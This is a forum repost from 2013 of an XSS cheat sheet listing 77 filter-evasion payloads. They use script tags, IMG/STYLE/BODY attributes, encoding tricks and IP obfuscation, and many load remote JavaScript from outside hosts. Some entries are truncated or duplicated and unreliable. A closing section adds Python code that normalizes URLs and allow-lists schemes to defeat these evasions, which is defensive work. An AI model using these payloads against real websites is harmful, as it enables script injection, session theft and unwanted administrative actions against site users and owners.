XSS Attack Roundup

Views: 2707 | Replies: 0
OP, posted 2013-4-19 19:22:37
There doesn't seem to be much XSS material on t00ls, so when I saw this good stuff I copied it over; not sure whether any of you need it bookmarked.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) IMG tag with a fixed-up defect
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Multi-line embedded JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Getting around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters basically have no effect in China, because there is nowhere to use them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) IMG tag with spaces and meta characters in front
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escape-filtered JavaScript
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG via STYLE
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash lets you smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace. The .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can add the JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) Decimal IP
<A HREF="http://3232235521">XSS</A>
(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267
Original source: http://fuzzexp.org/u/0day/?p=144
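Most of the entries above (4, 5, 7-14, 17-19, 70-73, 76) work against filters that pattern-match the raw attribute string, because the browser decodes character references, discards tabs/newlines/carriage returns, ignores case in the scheme and folds odd IPv4 spellings before it decides what the URL means. The defensive counterpart is to normalize first and judge the result. The following Python is an added example written for this page; it is not code from the original post or from the cheat sheet it copies. The function names, the allowed-scheme set and the sample inputs are assumptions made for the demo, and the NUL handling models the older engines the null-byte entries relied on rather than any current browser.

```python
import html
import re
from typing import Optional

# Assumption for the demo: schemes an application allows in href/src values.
# Everything else (javascript:, vbscript:, data:, ...) is rejected.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# A URL scheme: an ASCII letter, then letters/digits/'+'/'-'/'.', then ':'.
_SCHEME = re.compile(r"([A-Za-z][A-Za-z0-9+.\-]*):")

# Browsers remove TAB, LF and CR anywhere in a URL and ignore leading/trailing
# C0 controls and spaces. NUL is included only to model the older engines that
# the cheat sheet's null-byte entries (17, 18) targeted.
_IGNORED_ANYWHERE = re.compile(r"[\t\n\r\x00]")
_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))


def normalize_url_attr(value: str) -> str:
    """Return the URL a browser would actually act on for an attribute value.

    Decodes character references (decimal or hex, with or without the trailing
    semicolon: &#106; &#106 &#x6A; &#x6A), drops embedded tab/newline/CR/NUL and
    strips surrounding blanks. Each of those is a separate entry in the list.
    """
    decoded = html.unescape(value)
    decoded = _IGNORED_ANYWHERE.sub("", decoded)
    return decoded.strip(_C0_AND_SPACE)


def url_scheme(value: str) -> Optional[str]:
    """Lower-cased scheme of the normalized value, or None for a relative URL."""
    m = _SCHEME.match(normalize_url_attr(value))
    return m.group(1).lower() if m else None


def is_safe_url(value: str) -> bool:
    """Allow relative URLs and allow-listed schemes only, judged after normalization."""
    scheme = url_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES


def canonical_host(host: str) -> str:
    """Canonicalize a host before comparing it with a host allow list.

    IPv4 literals may be spelled as one decimal number, as hex (0x..) or octal
    (leading 0) parts, and with fewer than four parts; these are folded to
    dotted-quad form using the WHATWG IPv4 parser rules. DNS names are
    lower-cased and lose a trailing dot (the "absolute DNS" spelling).
    """
    parts = host.split(".")
    if parts and parts[-1] == "":        # trailing dot: absolute DNS name
        parts = parts[:-1]
    nums = []
    for p in parts:
        if re.fullmatch(r"0[xX][0-9a-fA-F]*", p):
            nums.append(int(p[2:] or "0", 16))
        elif re.fullmatch(r"0[0-7]*", p):
            nums.append(int(p, 8))
        elif re.fullmatch(r"[1-9][0-9]*", p):
            nums.append(int(p))
        else:                           # not an IPv4 literal: treat as a name
            return ".".join(parts).lower()
    if not 1 <= len(nums) <= 4:
        raise ValueError(f"invalid IPv4 literal: {host!r}")
    *lead, last = nums
    # Leading parts are single octets; the last part fills the remaining bytes.
    if any(n > 255 for n in lead) or last >= 256 ** (4 - len(lead)):
        raise ValueError(f"invalid IPv4 literal: {host!r}")
    addr = last
    for i, n in enumerate(lead):
        addr += n << (8 * (3 - i))
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


if __name__ == "__main__":
    # Constructed samples modelled on the list's entries, not copied from it.
    for sample in ["JaVaScRiPt:alert('XSS')", "&#x6A&#x61&#x76&#x61script:alert(1)",
                   "jav\tascript:alert(1)", " javascript:alert(1)", "http://example.com/"]:
        print(f"{sample!r:45} -> scheme={url_scheme(sample)!r} safe={is_safe_url(sample)}")
    for h in ["3232235521", "0xc0.0xa8.0x00.0x01", "0300.0250.0000.0001", "www.google.com."]:
        print(f"{h:25} -> {canonical_host(h)}")
```

Two design points matter here. First, the check is an allow list on the scheme rather than a block list on the string "javascript", so any spelling that normalizes to an unexpected scheme fails closed. Second, a protocol-relative value such as //www.google.com/ has no scheme and is accepted as relative; if the application must pin the host as well, run the host part through canonical_host and compare it with the allow list after canonicalization, since 3232235521, 0xc0.0xa8.0x00.0x01 and 0300.0250.0000.0001 are all the same address.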